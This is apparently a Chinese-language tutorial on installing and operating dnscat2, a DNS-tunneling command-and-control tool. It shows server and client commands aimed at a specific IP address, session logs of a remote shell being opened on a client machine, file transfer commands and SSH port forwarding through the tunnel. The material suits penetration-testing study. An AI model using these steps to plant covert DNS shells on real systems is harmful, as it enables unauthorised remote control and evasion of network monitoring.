一、安装

服务端安装

服务端安装如下,注意安装依赖,最新版的dnscat2需要ruby >= 2.3.0

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install

linux客户端安装

使用如下命令进行安装即可

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make

windows客户端安装
自己编译(只能使用VS 2008)

作者原话:Hmm, I have never tried to compile on that platform - just VS 2008.

或者去release下载 :https://downloads.skullsecurity.org/dnscat2/

服务端运行:

ruby dnscat2.rb --dns host=0.0.0.0,port=53531
ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)
ruby dnscat2.rb xxx.com

客户运行:

./dnscat --dns server=23.105.193.106,port=53531
./dnscat --dns server=23.105.193.106,port=53531 --secret=qwer1234(密钥)
./dnscat xxx.com

[scode type="red"]注:上面命令服务端和客户端一一对应,端口可以修改,通过域名连接的话需要域名指向你的服务器[/scode]

服务器运行命令:

[root@gelen server]# ruby dnscat2.rb --dns host=0.0.0.0,port=53531 --secret=qwer1234

New window created: 0
New window created: crypto-debug
dnscat2> Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53531
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53531 --secret=qwer1234

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53531.

客户端运行:

~/tools/dnscat2/client  ‹master› $ ./dnscat --dns server=23.105.193.106,port=53531 --secret=qwer1234                                                                                       130 ↵ Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53531
 type   = TXT,CNAME,MX
 server = 23.105.193.106

** Peer verified with pre-shared secret!
 Session established!

[scode type="blue"]Session established!(出此现此条提示说明连接成功)[/scode]

连接成功后服务器端会显示:

New window created: 1
/root/tools/dnscat2/server/controller/packet.rb:228: warning: constant ::Bignum is deprecated
/root/tools/dnscat2/server/controller/packet.rb:228: warning: constant ::Bignum is deprecated
/root/tools/dnscat2/server/controller/crypto_helper.rb:13: warning: constant ::Bignum is deprecated
/root/tools/dnscat2/server/controller/crypto_helper.rb:21: warning: constant ::Bignum is deprecated
/root/tools/dnscat2/server/libs/dnser.rb:379: warning: constant ::Fixnum is deprecated
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

通过sessions查看已经连接的记录:

dnscat2> sessions
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53531 domains =  [*]
  2 :: command (DESKTOP-J0NS3F6) [encrypted and verified] [*]
dnscat2> 

使用session -i 2 连接此客户端:

dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (DESKTOP-J0NS3F6) 1> 

help查看帮助:

command (DESKTOP-J0NS3F6) 1> help

Here is a list of commands (use -h on any of them for additional help):
* clear
* delay
* download
* echo
* exec
* help
* listen
* ping
* quit
* set
* shell
* shutdown
* suspend
* tunnels
* unset
* upload
* window
* windows
command (DESKTOP-J0NS3F6) 1> 

输入shell可创建一个客户端的shell or cmd连接:

command (DESKTOP-J0NS3F6) 1> windows

Windows active in this session (to see all windows, go to
the main window by pressing ctrl-z):

1 :: command (DESKTOP-J0NS3F6) [encrypted and verified] [active]
command (DESKTOP-J0NS3F6) 1> shell
Sent request to execute a shell
command (DESKTOP-J0NS3F6) 1> New window created: 2
Shell session created!

使用ctrl+Z退回到上一步,通过 sessions查看连接,可以看到多出了一个“sh”开头的连接,使用session -i 2连接上去:

dnscat2> sessions
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53531 domains =  [*]
  1 :: command (DESKTOP-J0NS3F6) [encrypted and verified]
  2 :: sh (DESKTOP-J0NS3F6) [encrypted and verified] [*]
dnscat2> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (DESKTOP-J0NS3F6) 2> 

现在可以执行客户端的命令了:

sh (DESKTOP-J0NS3F6) 2> uname -a
sh (DESKTOP-J0NS3F6) 2> Linux DESKTOP-J0NS3F6 4.4.0-17763-Microsoft #379-Microsoft Wed Mar 06 19:16:00 PST 2019 x86_64 x86_64 x86_64 GNU/Linux

sh (DESKTOP-J0NS3F6) 2> pwd
sh (DESKTOP-J0NS3F6) 2> /home/gelen/tools/dnscat2/client

其它的一些命令:

quit (退出控制台)
kill <id> (中断通道)
set(设值,比如设置security=open)
windows(列举出所有的通道)
window -i <id>(连接某个通道)
连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):

clear(清屏)
delay(修改远程会话超时时间)
exec(执行远程机上的程序)
shell(得到一个反弹shell)
download/upload(两端之间上传下载文件)
supend(返回到上一层,等于快捷键ctrl+z)

建立DNS隧道转发,先执行以下命令:

listen 127.0.0.1:888 10.0.0.10:22

然后你就可以通过888端口来进行SSH连接了,命令如下:

ssh cell@127.0.0.1 -p 888

其它就自己发挥了,good luck!!